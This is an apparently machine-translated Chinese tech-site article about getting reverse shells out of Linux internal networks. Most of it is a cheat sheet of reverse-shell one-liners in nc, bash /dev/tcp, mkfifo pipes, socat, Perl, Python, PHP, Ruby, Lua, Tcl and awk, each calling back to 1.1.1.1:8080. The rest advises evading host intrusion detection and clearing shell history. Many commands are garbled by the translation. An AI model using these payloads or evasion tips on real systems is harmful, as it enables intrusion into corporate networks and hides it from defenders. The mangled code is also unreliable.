Shulou(Shulou.com)06/01 Report--

This article mainly introduces the relevant knowledge of "what is the method of intranet rebound under Linux". The editor shows you the operation process through an actual case. The operation method is simple, fast and practical. I hope this article "what is the method of intranet rebound under Linux" can help you solve the problem.

Summary of rebound skills:

1. NC bounces Nc 1.1.1.1 8080-e / bin/bash2, Bash-socket bounces / bin/bash-I > / dev/tcp/1.1.1.1/8080 0x13, Shell-socket bounces a) exec 2 > & 0exec 196devqqqqqp8080; sh & 1962 > & 196b) exec 5/dev/tcp/1.1.1.1/8080 cat while read line; do $line 2 > & 5 > & 5 Done [execute in two sentences] 4. File pipeline-nc/telnet bounce a) rm / tmp/f;mkfifo / tmp/f;cat / tmp/f | / bin/sh-I 2 > & 1 | nc 1.1.1.1 8080 > / tmp/fb) rm / tmp/backpipe;mknod / tmp/backpipe pash rm 0/backpipe 0/backpipe | nc 1.1.1.1 8080 1 > / tmp/backpipec) rm / tmp/backpipe Mknod / tmp/backpipe p & & telnet 1.1.1.1 8080 0/backpipe | / bin/bash 1 > / tmp/backpipe5, Bash-telnet bounce telnet 1.1.1.1 8080 | / bin/bash | telnet 1.1.1.1 9090 [another port] 6, Socat bounce socat tcp-connect:1.1.1.1:8080 exec: "bash-li", pty,stderr,setsid,sigint,sane7, script bounce a) Perl bounce 1) perl-e 'use Socket $open (STDIN, "> & S"); open (STDOUT, "> & S"); open (STDERR, "> & S"); exec ("/ bin/sh-I");};'2) perl-MIO-e'$pamphlet for exitplace if ($p) $c=new IO::Socket::INET (PeerAddr, "1.1.1.1 STDIN- 8080"); STDIN- > fdopen ($c _ r); $~-> fdopen ($c ~ w); system$_ while;'b) Python bounce python-c 'import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect ("1.1.1.1", 8080); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1) Os.dup2 (s.fileno (), 2); p=subprocess.call (["/ bin/sh", "- I"]);'c) PHP rebound php-r'$sock=fsockopen ("1.1.1.1", 8080); exec ("/ bin/sh-I & 32 > & 3");'d) ruby rebound ruby-rsocket-e'f=TCPSocket.open ("1.1.1.1", 8080). To_i Exec sprintf ("/ bin/sh-I &% d 2 > &% d")'2) ruby-rsocket-e 'exit if fork;c=TCPSocket.new ("1.1.1.1", "8080"); while (cmd=c.gets); IO.popen (cmd, "r") {| io | c.print io.read} end'e) lua rebound lua-e "require (' socket'); require ('os'); t=socket.tcp (); t:connect (' 1.1.1.1) Os.execute ('/ bin/sh-I & 32 > & 3'); "f) tcl bounce back echo 'set [socket 1.1.1.1 8080]; while 42 {puts-nonewline $s" shell > "; flush $s10 gets $s c set e" exec $c "; if {! [catch {set r [eval $e]} err]} {puts $s $r}; flush $s;}; close $sscape' | tclshg) awk bounce awk 'BEGIN {s =" / inet/tcp/0/1.1.1.1/8080 " While (42) {do {printf "shell >" | & s; s | & getline c; if (c) {while ((c | & getline) > 0) print $0 | & print close (c);}} while (c! = "exit") close (s);}'/ dev/null8, binary program bounce Socket program + command execution, see metasploit for details.

Miscellaneous talk

Rebound shell on the market, there are many scripts and procedures, metasploit, for example, can produce hundreds of shell, but after decoding nothing more than the above, interesting time metasploit generated no matter the script rebound procedures or binary rebound procedures are mostly their own implementation of the system_call, rather than calling the system bash or commands and so on, it seems that doing is very conscientious.

It is worth mentioning that since large Party A companies will have HIDS protection, the known HIDS either modifies the bash, hijacks the glibc, or modifies the underlying layer of the system (this possibility is low, and the probability of problems is high).

When you think you can rebound shell, you must identify the environment in advance, otherwise you will execute a bash-I or nc, which is likely to be directly taken away by hids.

It is recommended to use shell built-in bounce or script type of bounce shell program, the general hids will not be recorded, it is not recommended to call the system bash command to produce a rebound, at least. Bash_history will properly sell you.

Intranet shell rebound is a topic that cannot be bypassed in both osmosis and reverse osmosis. There are several interesting questions about bounce shell:

\ 1. Understanding of bouncing shell:

The essence of private network shell rebound is to establish a connection with the public network server, and execute the commands transmitted from the public network server, and return the result. Therefore, the rebound shell involves two processes: network establishment and command execution, both of which are the criteria for measuring the bounce function. Network establishment requires complex encryption (such as msf: meterpreter_reverse_https, etc.), and command execution requires bypassing hids and related records as far as possible.

two。 Interactive shell:

Interactive shell is the most common kind of shell. The biggest difference between interactive shell and non-interactive shell is that it loads environment variables. The use of interactive shell is almost the same as in terminal terminal. In general, remote command execution bounces back just to implement a non-interactive shell. One of the easiest ways to upgrade from non-interactive shell to interactive shell is to use the python script pty.spawn ("/ bin/bash")

\ 3. Interactive shell may not be better than non-interactive shell in the actual infiltration process, because experienced Party A will securely handle environment variables and shell terminal load files such as .bashrc, bash_profile, etc., and directly upgrade to interactive shell. The possibility of triggering HIDS alarm is higher (not absolute, of course).

(Ps: if you use other people's tools, bounce shell, but it is not clear whether it is interactive shell, a simple way is to execute history and set commands, if there are normal returns, then you should be careful, you may get an interactive shell, clear history as soon as possible. )

This is the end of the content about "what is the method of intranet rebound under Linux"? thank you for your reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.